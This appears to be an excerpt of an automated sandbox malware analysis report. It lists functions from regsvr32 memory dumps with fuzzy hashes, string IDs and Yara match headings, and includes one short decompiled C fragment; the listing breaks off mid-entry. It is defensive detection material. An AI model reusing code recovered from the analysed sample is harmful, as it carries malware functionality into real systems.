                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: !oW!$ke&Q
                                                                                                                                                                                                                    • API String ID: 0-419570616
                                                                                                                                                                                                                    • Opcode ID: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                                                                                                                                                    • Instruction ID: fa55de1c95cd1cefcb228b832292f5a761c0f5f253653417a1da5e21b504ae90
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE51D6B090074E8FDB48CF68C88A5DE7FB0FB68398F104619EC55A6290D7B496A5CFD4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02584758 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ?j|$P
                                                                                                                                                                                                                    • API String ID: 0-615948335
                                                                                                                                                                                                                    • Opcode ID: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                                                                                                                                                    • Instruction ID: 78bc83ab2439ea15a33240e79fbeae39f039f62a5c1f95e4800cd53784074b1d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8941D3B090034A8FDB48DF64C48A5DE7FB1FB68388F50461DE816A6390D7B896A4CFD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02598A2C Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: j$[
                                                                                                                                                                                                                    • API String ID: 0-3696242357
                                                                                                                                                                                                                    • Opcode ID: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                                                                                                                                                    • Instruction ID: 35be19a70a36759f82193d6b7987323dd734cfd7b74329093c067f0a178e9c19
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA41F5B090074E8BDB48DF64C48A5DE3FB1FB58398F11861DE856A6290D3B4D6A4CFC1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02595880 Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: %$aI
                                                                                                                                                                                                                    • API String ID: 0-3604358270
                                                                                                                                                                                                                    • Opcode ID: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                                                                                                                                                    • Instruction ID: 070851f02cb68a0667590e69cf2a812d1bb586139d32ac50be06d78b0507dd15
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3641C6B190038A8BCF48DF64C99A5DE7BB1FB48358F114A2DF86697350D3B49664CF84
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259C058 Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: + $S"
                                                                                                                                                                                                                    • API String ID: 0-2880694137
                                                                                                                                                                                                                    • Opcode ID: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                                                                                                                                                    • Instruction ID: 44a79de264f49e5486cbee5bf38ed781af956ebc45491aa7b85a94666ade3824
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C951B6B090078E8FDF88DF64C88A5DE7BB0FB58354F10461DE866A6250D3B8D665CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259B130 Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: =K$d%
                                                                                                                                                                                                                    • API String ID: 0-2790768846
                                                                                                                                                                                                                    • Opcode ID: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                                                                                                                                                    • Instruction ID: e7b90b066051f6e2860694aea5fa116afa89917dbfcf182840237b98d547b47c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E41E4B090074E8BDF48CF64C88A5DE7BF1FB58358F104A1DE86AA6250D3B89665CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025895BC Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #|$`
                                                                                                                                                                                                                    • API String ID: 0-1687004633
                                                                                                                                                                                                                    • Opcode ID: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                                                                                                                                                    • Instruction ID: c7aee2f166c214e1d91b10b75d4a4db93ddd646d4205f2cac54636369144df33
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF41D5B190078E8FDF88DF68C88A4DE7BF0FB58358F014619F856A6250D3B89665CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259C44C Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: c$j~;
                                                                                                                                                                                                                    • API String ID: 0-3832213246
                                                                                                                                                                                                                    • Opcode ID: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                                                                                                                                                    • Instruction ID: ec3bb452116023532af3340041e7c62fe60c4842f549a21c41f400002e5cb6ad
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E41A5B080078E8FDB88DF64C88A1DF7BB0FB54358F104A19EC66A6250D3B49661CFD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02587C08 Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: -h$W
                                                                                                                                                                                                                    • API String ID: 0-4146498651
                                                                                                                                                                                                                    • Opcode ID: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                                                                                                                                                    • Instruction ID: 2efb24a8e4aa9fcc3a50eec9a386130b8713209693dbd8bb478d219359e5b337
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA41B4B590038E9FDB44CF68D88A5CE7FF0FB48358F114619F869A6250D3B49664CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025A8A00 Relevance: 2.6, Strings: 2, Instructions: 81COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: .$fp
                                                                                                                                                                                                                    • API String ID: 0-3298127435
                                                                                                                                                                                                                    • Opcode ID: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                                                                                                                                                    • Instruction ID: e3607238a5dd1c2bea13a75af85e2d3f589ccb4c86b78474ac18d18705ad3188
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9641F4B190470E8BDF88CF64C48A4DE7FB0FB68398F104619E856A6290D3B89665CFC4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02588FB0 Relevance: 2.6, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: "$Zs
                                                                                                                                                                                                                    • API String ID: 0-3922668666
                                                                                                                                                                                                                    • Opcode ID: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                                                                                                                                                    • Instruction ID: f1d62621bd08a38fa15a490595be93b85bae5397fb0987493b8f1264ce03d9fe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 803192B0529380ABC388DF28D19A91EBBE1FBD5708F806A1DF8C286390D374D406CB43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02587840 Relevance: 2.6, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: XW$s [
                                                                                                                                                                                                                    • API String ID: 0-2366283936
                                                                                                                                                                                                                    • Opcode ID: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                                                                                                                                                    • Instruction ID: c8620a86b0501fca327921337904d07bbca0ac58b79dbc40019122cd377fd21c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 623190B190478E8FDF48DF28D88949A3BE1FB48304B004A1DFC6AD7250D7B4D665CB95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02584C84 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 4V$jn(
                                                                                                                                                                                                                    • API String ID: 0-2529302498
                                                                                                                                                                                                                    • Opcode ID: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                                                                                                                                                    • Instruction ID: cb5d544f3b4b9f04c9dfd671481ec3bad593690e5eb4dddf862df6e3aa1dae86
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17317EB1529381AFC398CF28C48A91ABBE0FBC9318F806A1DF8C686260D774D555CB02
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258F65C Relevance: 2.6, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: '$%6
                                                                                                                                                                                                                    • API String ID: 0-1852427169
                                                                                                                                                                                                                    • Opcode ID: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                                                                                                                                                    • Instruction ID: 05249663a0179330ad45d21934dcfd5c9628912d79576b4f5c22a08ed84997fc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD316FB5568381ABD388DF28C48A81ABBF1FB89308F806A1DF8C6DB251D775D545CB43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02588A8C Relevance: 2.6, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: uS$J
                                                                                                                                                                                                                    • API String ID: 0-437994327
                                                                                                                                                                                                                    • Opcode ID: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                                                                                                                                                    • Instruction ID: 536cd914965442d3f5ac28021a33f3da4f35af5a33a06c5a1c41a79dfd491883
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8031C6B190034E8FDB84DF64C88A5DE7FB0FB68358F104619E859A6260D3B88695CFD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02590A70 Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: +@$`.P
                                                                                                                                                                                                                    • API String ID: 0-1189405855
                                                                                                                                                                                                                    • Opcode ID: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                                                                                                                                                    • Instruction ID: 39de2ea6a026fc69778914cf9e44a5f31bb4615b8119a4e03ad8497b2faa6ad6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1316FB15187848FD348DF28C45941BBBE1BB9C758F804B1DF4CAAA260D778D645CF4A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02583CF4 Relevance: 2.6, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ^$R
                                                                                                                                                                                                                    • API String ID: 0-3595634639
                                                                                                                                                                                                                    • Opcode ID: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                                                                                                                                                    • Instruction ID: 7dec6e6ff202478201587024085261afee01554c9ae7569198c8fcb843946a7e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 112180B0528781AFC398DF28D49591FBBF1BB88744F806A1DF8C686390D779D505CB46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02582FD4 Relevance: 2.6, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: t^$w
                                                                                                                                                                                                                    • API String ID: 0-1486493484
                                                                                                                                                                                                                    • Opcode ID: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                                                                                                                                    • Instruction ID: 0fcab25796e593e8dfb7fafe86ea51ff53beb953310655f2f877b1f2b437242d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1219DB090078E8FDB48DF68D8491DE7BB0FB18308F014A59F82996290D3B89665CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02591924 Relevance: 1.7, Strings: 1, Instructions: 428COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #
                                                                                                                                                                                                                    • API String ID: 0-606707520
                                                                                                                                                                                                                    • Opcode ID: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                                                                                                                                    • Instruction ID: 7cfaef0116eaeaef1228b0b6e0a788d5d06f715ea8999149e50523ccec19940a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB222870D1470AEFDF58DFA8C45A59EBBF1FB44348F00816DE80AAB290D7749A19CB85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180008D28 Relevance: 1.6, APIs: 1, Instructions: 149COMMONCrypto
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E00000001180008D28(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
				signed long long _t25;
				void* _t27;
				void* _t30;

				 *((long long*)(_t30 + 8)) = __rbx;
				 *(_t30 + 0x10) = _t25;
				 *((long long*)(_t30 + 0x18)) = __rsi;
				_t27 = (_t25 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(__rcx + _t27)) != dil) goto 0x80008d56;
				if (_t27 + __rdx -  !__r8 <= 0) goto 0x80008d92;
				return __rdx + 0xb;
			}






                                                                                                                                                                                                                    0x180008d28
                                                                                                                                                                                                                    0x180008d2d
                                                                                                                                                                                                                    0x180008d32
                                                                                                                                                                                                                    0x180008d56
                                                                                                                                                                                                                    0x180008d5d
                                                                                                                                                                                                                    0x180008d70
                                                                                                                                                                                                                    0x180008d91

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
                                                                                                                                                                                                                    • Instruction ID: 1f7af7de608e037a3e69fafdab2b7a4d19b0596ea53e23cf5e8b59c7fdfa90c1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D151C432700B9489FBA1DB72A8447DE7BA1B7587D4F148225FE9827B99DF38C605D700
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02591030 Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ef
